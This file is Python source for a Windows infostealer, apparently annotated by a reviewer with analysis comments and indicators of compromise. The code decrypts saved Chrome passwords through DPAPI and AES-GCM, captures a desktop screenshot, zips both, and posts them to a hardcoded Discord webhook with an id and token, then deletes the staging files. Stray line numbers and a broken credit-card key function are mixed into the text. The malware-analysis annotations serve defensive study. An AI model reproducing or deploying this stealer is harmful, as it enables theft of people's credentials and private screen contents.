1import sys, os, re, json, ctypes, shutil, base64, sqlite3, zipfile, subprocess, cryptography
# NOTE(review): this script is a Windows-only credential/screenshot stealer that
# exfiltrates over a Discord webhook. It bails out on Linux; every later path
# (%LOCALAPPDATA%, crypt32 DPAPI, C:\ProgramData) assumes Windows.
if sys.platform.startswith('linux'):
    exit()

else:
    pass
7
8
9from cryptography.hazmat.primitives.ciphers import (Cipher, algorithms, modes)
10from cryptography.hazmat.primitives.ciphers.aead import AESGCM
11from cryptography.hazmat.backends import default_backend
12from Crypto.Cipher import AES
13
14
15from dhooks import Webhook, File, Embed, Webhook
16from urllib.request import Request, urlopen
17from subprocess import Popen, PIPE
18from json import loads, dumps
19from base64 import b64decode
20from shutil import copyfile
21from PIL import ImageGrab
22from sys import argv
23
24# WEBHOOK HERE :
25# BELOW IS AN EXAMPLE OF WHAT YOUR WEBHOOK-ID, AND WEBHOOK-TOKEN IS
26# V "webhID" V "webhAT"
27# discord/api/webhooks/000000000000/token
# Hardcoded exfiltration endpoint: a Discord webhook id/token pair. The URL is
# assembled from string fragments (presumably to dodge naive string matching);
# the resulting host is discord.com. Treat the id, the token and the assembled
# URL as indicators of compromise. The Webhook object is created at import time.
webhID = "803138051315466260"
webhAT = "9t0lEhiiLAYYlhZj7VaXN3MOWnD9xG3y5DwzJguSW0QqRGt1CIn9t3tB00XXodt9JWs9"

http = "https"
disc = "discord"
webh = "webhooks"
appl = "api"
server = f"{http}://{disc}.com/{appl}/{webh}/{webhID}/{webhAT}"
hook = Webhook(f"{server}")
37
38
39# VARIABLES
APP_DATA_PATH: str = os.environ['LOCALAPPDATA']  # %LOCALAPPDATA%; raises KeyError off-Windows
DB_PATH: str = r'Google\Chrome\User Data\Default\Login Data'  # Chrome saved-logins SQLite DB, Default profile only
NONCE_BYTE_SIZE: int = 12  # AES-GCM nonce length; not referenced in the visible code (decryptions() hardcodes [3:15])
43
44
def encrypt(cipher, plaintext: bytes, nonce: bytes):
    """AES-GCM encrypt *plaintext*, re-moding *cipher* to GCM(nonce) in place.

    Not called anywhere in the visible file. Only ``update()`` is invoked,
    never ``finalize()``, so no authentication tag is produced and the
    returned ciphertext is unauthenticated.

    Returns:
        (cipher, ciphertext, nonce) tuple.
    """
    cipher.mode = modes.GCM(nonce)
    encryptor = cipher.encryptor()
    ciphertext = encryptor.update(plaintext)
    return (cipher, ciphertext, nonce)
50
51
def decrypt(cipher, ciphertext: bytes, nonce: bytes) -> bytes:
    """AES-GCM decrypt *ciphertext*, re-moding *cipher* to GCM(nonce) in place.

    ``finalize()`` is never called, so the GCM tag is neither supplied nor
    verified: this is keystream-only decryption with no integrity check.
    The caller (cdecrypt) strips the last 16 bytes of the result, consistent
    with the tag being appended to the input blob and decrypted as garbage.
    """
    cipher.mode = modes.GCM(nonce)
    decryptor = cipher.decryptor()
    return decryptor.update(ciphertext)
56
57
def rcipher(key: bytes):
    """Build an AES Cipher for *key* with no mode; encrypt()/decrypt() assign GCM later."""
    cipher = Cipher(algorithms.AES(key), None, backend=default_backend())
    return cipher
61
62
def dpapi(encrypted: bytes) -> bytes:
    """Unprotect *encrypted* with Windows DPAPI via ``crypt32.CryptUnprotectData``.

    Runs under the calling user's DPAPI context (flags=0, no entropy, no
    prompt), i.e. it is executed as the victim user on the victim host.
    ``ctypes.windll`` only exists on Windows.

    Raises:
        ctypes.WinError: when CryptUnprotectData returns 0 (e.g. wrong user/
        machine context or a non-DPAPI blob).
    """
    import ctypes
    import ctypes.wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [('cbData', ctypes.wintypes.DWORD),
                    ('pbData', ctypes.POINTER(ctypes.c_char))]

    p = ctypes.create_string_buffer(encrypted, len(encrypted))
    blobin = DATA_BLOB(ctypes.sizeof(p), p)
    blobout = DATA_BLOB()
    retval = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
    if not retval:
        raise ctypes.WinError()
    result = ctypes.string_at(blobout.pbData, blobout.cbData)
    # Output buffer is LocalAlloc'd by the API; release it after copying.
    ctypes.windll.kernel32.LocalFree(blobout.pbData)
    return result
81
82
def localdata() -> str:
    """Return the base64 ``os_crypt.encrypted_key`` string from Chrome's Local State.

    Only the first line is read (``readline``), so this presumably relies on
    Local State being single-line JSON; a pretty-printed file would not parse.
    Raises FileNotFoundError if Chrome is not installed for this user.
    """
    jsn = None
    with open(os.path.join(os.environ['LOCALAPPDATA'], r"Google\Chrome\User Data\Local State"), encoding='utf-8', mode="r") as f:
        jsn = json.loads(str(f.readline()))
    return jsn["os_crypt"]["encrypted_key"]
88
89
def decryptions(encrypted_txt: bytes) -> bytes:
    """Decrypt a ``v10``-prefixed Chrome password blob with the Local State key.

    Key recovery: base64-decode the Local State key, drop its 5-byte prefix
    (presumably a ``DPAPI`` marker), then DPAPI-unprotect the remainder.
    Assumed blob layout: bytes 0-2 version tag, 3-14 the 12-byte GCM nonce,
    15- ciphertext plus trailing tag. The tag is never verified (see decrypt).
    """
    encoded_key = localdata()
    encrypted_key = base64.b64decode(encoded_key.encode())
    encrypted_key = encrypted_key[5:]
    key = dpapi(encrypted_key)
    nonce = encrypted_txt[3:15]
    cipher = rcipher(key)
    return decrypt(cipher, encrypted_txt[15:], nonce)
98
99
class chromepassword:
    """Harvest saved Chrome logins into ``self.passwordList`` and dump them to disk.

    Host artifacts (IOCs): a copy of Login Data at ``%LOCALAPPDATA%\\sqlite_file``
    (deleted only if pwsd completes) and a plaintext dump at
    ``C:\\ProgramData\\passwords.txt``.
    """
    def __init__(self):
        self.passwordList = []  # one 'HOST/NAME/VALUE' text record per login row


    def chromedb(self):
        """Copy the (possibly locked) Login Data DB to a scratch file and parse it."""
        _full_path = os.path.join(APP_DATA_PATH, DB_PATH)
        _temp_path = os.path.join(APP_DATA_PATH, 'sqlite_file')
        if os.path.exists(_temp_path):
            os.remove(_temp_path)
        # Copy sidesteps the lock Chrome holds on the live DB while running.
        shutil.copyfile(_full_path, _temp_path)
        self.pwsd(_temp_path)

    def pwsd(self, db_file: str):
        """Read every row of ``logins`` from *db_file*, decrypt, and record it.

        Rows whose signon_realm starts with 'android' are skipped. The scratch
        DB is removed at the end; if cdecrypt raises something other than
        WindowsError (e.g. UnicodeDecodeError), the copy is left behind.
        """
        conn = sqlite3.connect(db_file)
        _sql = 'select signon_realm,username_value,password_value from logins'
        for row in conn.execute(_sql):
            host = row[0]
            if host.startswith('android'):
                continue
            name = row[1]
            value = self.cdecrypt(row[2])
            _info = 'HOST: %s\nNAME: %s\nVALUE: %s\n\n' % (host, name, value)
            self.passwordList.append(_info)
        conn.close()
        os.remove(db_file)


    def cdecrypt(self, encrypted_txt: bytes) -> str | None:
        """Decrypt one password_value blob by format prefix.

        ``\\x01\\x00\\x00\\x00`` → legacy per-entry DPAPI blob; ``v10`` → AES-GCM
        under the Local State key (tag stripped, not verified). Returns None on
        WindowsError; any other prefix also yields None (falls off the end).
        Off win32 the method is a no-op and returns None.
        """
        if sys.platform == 'win32':
            try:
                if encrypted_txt[:4] == b'\x01\x00\x00\x00':
                    decrypted_txt = dpapi(encrypted_txt)
                    return decrypted_txt.decode()
                elif encrypted_txt[:3] == b'v10':
                    decrypted_txt = decryptions(encrypted_txt)
                    return decrypted_txt[:-16].decode()
            except WindowsError:
                return None
        else:
            pass


    def saved(self):
        """Overwrite C:\\ProgramData\\passwords.txt with the collected records in plaintext."""
        with open(r'C:\ProgramData\passwords.txt', 'w', encoding='utf-8') as f:
            f.writelines(self.passwordList)
146
147
# Entry guard: harvest, swallow every exception, then write whatever was
# collected. The bare ``except: pass`` hides all failures (no Chrome, locked
# DB, DPAPI error) so saved() still runs and produces a possibly empty
# passwords.txt. NOTE: everything below this guard runs unconditionally at
# import time, not only under __main__.
if __name__ == "__main__":
    main = chromepassword()
    try:
        main.chromedb()
    except:
        pass
    main.saved()
155
156
157# DESKTOP SCREENSHOT :
# Full-desktop capture written to %ProgramData%\desktop.jpg (IOC). The
# open()/close() pair is a no-op; File() just wraps the path for dhooks upload.
screen = ImageGrab.grab()
screen.save(os.getenv('ProgramData') + r'\desktop.jpg')
screen = open(r'C:\ProgramData\desktop.jpg', 'rb')
screen.close()
screenshot = File(r'C:\ProgramData\desktop.jpg')
163
164
165# PASSWORDS > .ZIP :
# Bundle the plaintext password dump and the screenshot into
# C:\ProgramData\passwords.zip (IOC). The zip is unencrypted; ZipFile is not
# used as a context manager, so an exception here leaves a partial archive.
# Note passwords.txt only exists if the __main__ block above ran.
zname = r'C:\ProgramData\passwords.zip'
newzip = zipfile.ZipFile(zname, 'w')
newzip.write(r'C:\ProgramData\passwords.txt')
newzip.write(r'C:\ProgramData\desktop.jpg')
newzip.close()
passwords = File(r'C:\ProgramData\passwords.zip')
172
173
174# SEND INFORMATION > REMOVE EVIDENCE :
# Exfiltration: two HTTPS POSTs to the Discord webhook (screenshot, then the
# zip), followed by deletion of the three staging files. Network telemetry to
# discord.com/api/webhooks from a non-browser process and the short-lived
# files in C:\ProgramData are the detection opportunities; the removals are
# not guaranteed to run if either send() raises.
hook.send("desktop :", file=screenshot)
hook.send("passwords :", file=passwords)
os.remove(r'C:\ProgramData\passwords.txt')
os.remove(r'C:\ProgramData\desktop.jpg')
os.remove(r'C:\ProgramData\passwords.zip')
180
181
182# GOOGLE CHROME | CREDIT-CARDS :
def master():
    """Attempt to recover Chrome's Local State master key (labelled "credit-cards").

    Despite the header, no card data is read here; the function only re-derives
    the key. The bare ``except: pass`` leaves ``local_state`` unbound if the
    file cannot be opened, and the final ctypes call does not build the
    DATA_BLOB arguments that dpapi() above uses, so as written this function
    is not a working DPAPI unprotect. Unused in the visible file.
    """
    try:
        with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State',
                  "r", encoding='utf-8') as f:
            local_state = f.read()
            local_state = json.loads(local_state)
    except:
        pass
    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]
    master_key = ctypes.windll.crypt32.CryptUnprotectData(
        (master_key, None, None, None, 0)[1])
    return master_key